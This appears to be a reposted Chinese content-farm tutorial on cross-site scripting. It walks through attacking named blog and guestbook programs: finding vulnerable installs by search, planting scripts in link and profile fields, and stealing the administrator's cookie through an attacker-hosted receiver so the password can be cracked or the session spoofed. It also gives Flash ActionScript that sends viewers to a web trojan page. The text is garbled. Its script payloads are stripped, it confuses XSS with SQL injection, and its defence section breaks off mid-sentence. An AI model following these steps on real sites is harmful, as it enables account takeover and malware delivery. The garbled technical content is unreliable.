空间攻防的概念研究及技术发展(防攻击空间)

导读 大家好,我是小百,我来为大家解答以上问题。空间攻防的概念研究及技术发展,防攻击空间很多人还不知道,现在让我们一起来看看吧!1、跨站...

大家好,我是小百,我来为大家解答以上问题。空间攻防的概念研究及技术发展,防攻击空间很多人还不知道,现在让我们一起来看看吧!

1、跨站漏洞是由于程序员在编写程序时对一些变量没有做充分的过滤,直接把用户提交的数据送到SQL语句里执行,这样导致用户可以提交一些特意构造的语句 一般都是带有像JavaScript等这类脚本代码。

2、在这基础上,黑客利用跨站漏洞输入恶意的脚本代码,当恶意的代码被执行后就形成了所谓的跨站攻击。

3、一般来说对于人机交互比较高的程序,比如论坛,留言板这类程序都比较容易进行跨站攻击。

4、 利用跨站漏洞黑客可以在网站中插入任意代码,这些代码的功能包括获取网站管理员或普通用户的cookie,隐蔽运行网页木马,甚至格式化浏览者的硬盘,只要脚本代码能够实现的功能,跨站攻击都能够达到,因此跨站攻击的危害程度丝毫不亚于溢出攻击,下面我们就来了解一下跨站攻击的主要攻击形式。

5、 一.跨站攻击常用的脚本代码 跨站攻击都是通过脚本代码来实现的,通过写入不同的脚本代码来实现不同的功能,跨站攻击中常用的脚本代码有如下几段: ,当用户浏览到插入有这句代码的网页时,将会弹出一个警告对话框,对话框中的内容为“网站存在跨站漏洞”,内容部分可以随意更改。

6、 ,这句代码将会弹出一个包含有浏览者cookie信息的对话框,如果用户已经通过帐号登陆网站,在显示的cookie信息中将会包含有用户的账户名和密码。

7、 ,当用户浏览该页时,将弹出一个高为200,宽为200的网页窗口,在其中打开的页面是http://www.pete.cn/default.asp 上面这些跨站攻击时常用的脚本代码,和我们平时使用的一些代码并无两样,为什么到了黑客手中却是一件武器?这些代码又是如何在跨站攻击中发挥强大作用的呢?下面我们将通过几个实例,来了解跨站攻击的主要形式和这些脚本代码在攻击过程中的作用。

8、 二.跨站攻击的简单实例 首先我们得找到有跨站漏洞的程序,这类程序很多,例如论坛、博客、留言板程序,其中很大一部分都存在跨站漏洞。

9、例如第6期报纸上我们曾检测过的L-blog,由于其申请友情连接的文件对特殊字符过滤不严,形成跨站漏洞,在其友情连接的说明文本框中可以输入跨站脚本代码,从而造成跨站攻击。

10、 通过百度以“L-Blog V1.10 AIO”为关键字进行搜索,可以找到很多该版本的L-Blog程序,进入L-blog的主页,在页面下方找到“首页友情链接”,点击“更多友情链接”进入其友情链接的设置界面。

11、在其链接的“名称”文本框中输入“”(不带引号,下同),“地址”一栏可以随便填,最后点击“提交你的站点”。

12、这样我们就将跨站脚本写入了数据库,接下来要做的就是等待管理员验证链接申请。

13、 当管理员登陆L-blog的后台管理,点击“链接验证”选项后就会运行我们的跨站脚本,弹出一个警告对话框。

14、当然我们这里的脚本代码只是起到提醒作用,并没有任何破坏性。

15、如果插入的是恶意的脚本代码,后果将严重得多。

16、 图1.弹出警告对话框 三.通过跨站攻击获取cookie cookie包含着用户的重要信息,包括用户在这个网站上的ID,密码、浏览过的网页、停留的时间等信息。

17、跨站攻击的最主要危害就是可以获取用户的cookie,包括网站上所有用户的账户名和密码,管理员也不例外。

18、一但黑客从管理员的cookie文件中破解出密码原文,那么网站很可能被黑客渗透。

19、 本例我们以一款著名的留言板程序——桃源多功能留言板 V2.0来进行演示,该版本的“桃源多功能留言板”程序在用户注册文件和用户资料文件中皆存在跨站漏洞。

20、我们先注册一个用户,注册的时候在“个人主页”一项的文本框中输入“http://”,其他项可以随便填。

21、这样当管理员点击首页上的“用户管理”链接时将会运行我们的跨站脚本代码,同时会弹出管理员自己的cookie信息。

22、 虽然管理员可以看见自己的cookie信息,但是黑客又是如何得到管理员的cookie信息的呢?这就需要我们构造一个用来接收cookie信息的文件,并在跨站的脚本代码上进行相应的修改。

23、 首先新建一个文本文档,在文档中写入接收cookie信息文件的内容,代码内容如图2所示。

24、然后将这个文本文档保存为test.asp,并上传到一个支持asp的网页空间(空间必须支持FSO组件,否则测试将不能成功)。

25、回到“桃源多功能留言板”,点击“修改资料”,将其中的“个人主页”一项修改为“http://”。

26、 图2.接受cookie信息的文件 当管理员运行这段脚本代码后,并不会弹出自己的cookie信息,甚至没有任何提示,因此隐蔽性很高。

27、在此期间,我们已经准确地获取到了管理员的cookie信息。

28、接收到的cookie信息会保存为“日期+时间”形式的文件。

29、 图3.截获到的管理员cookie信息 在cookie信息中包含着管理员的账户名和密码,虽然密码是用MD5加密算法进行加密的,但是仍可以通过暴力破解得到密码的原文,对于一些不是很强壮的密码,则可以在很短的时间内得出。

30、此外还可以通过cookie欺骗的方法登陆网站,进行一些只有管理员才能进行的操作。

31、 四:flash文件中的跨站陷阱 跨站攻击的形式是多样的,不仅可以在网页中插入跨站脚本代码,而且可以在flash文件中插入跨站脚本代码,实现跨站攻击。

32、由于flash文件有较高的安全性,用户通常对flash文件的警惕性不够,因此用flash文件进行跨站攻击的成功率很高。

33、如果将这个含有跨站脚本代码的flash文件插入到网页中,例如制作成网页banner或者广告,那么中招的用户将更多。

34、 flash跨站是通过在flash文件中插入动作脚本来实现的,通过在flash文件“帧”的“动作”中插入跨站脚本代码来实现跨站攻击,其实现方法入下: 首先运行flash文件制作工具flash8.exe,新建一个空白的flash文档。

35、然后选中其中的第一帧,进入界面下方的“动作”编辑界面,在Action Script中插入我们的跨站脚本代码: getURL("http://网页木马地址", "_blank", "GET"); loadMovieNum("http://www.pete.cn/test.swf";, 0); 图4.插入跨站脚本代码 其中第一句可以让打开这个flash文件的用户运行网页木马,而后面一句的作用是打开一个普通的flash文件,目的是为了不引起用户怀疑。

36、制作完毕后点击“文件”菜单→“导出”→“导出影片”,将这个flash文件导出为swf格式即可。

37、用户运行这个flash文件后将会打开含有木马的网页。

38、 五.防范跨站攻击 跨站攻击相对于其他网络攻击而言显得更隐蔽,也更难防范。

39、很多时候问题并不出在用户身上,而是由于网站的问题,即使我们装了防火墙,也对跨站攻击无能为力,因此防范跨站攻击我们得从两方面入手,即网站方面和个人用户方面: 1.过滤特殊字符 在网站程序处过滤特殊字符,这是防范跨站脚本攻击最为有效和彻底的方法。

40、在不影响网站程序正常运行的前提下,我们可以在网站程序的表单输入处过滤掉“javascript”、“。

本文到此讲解完毕了,希望对大家有帮助。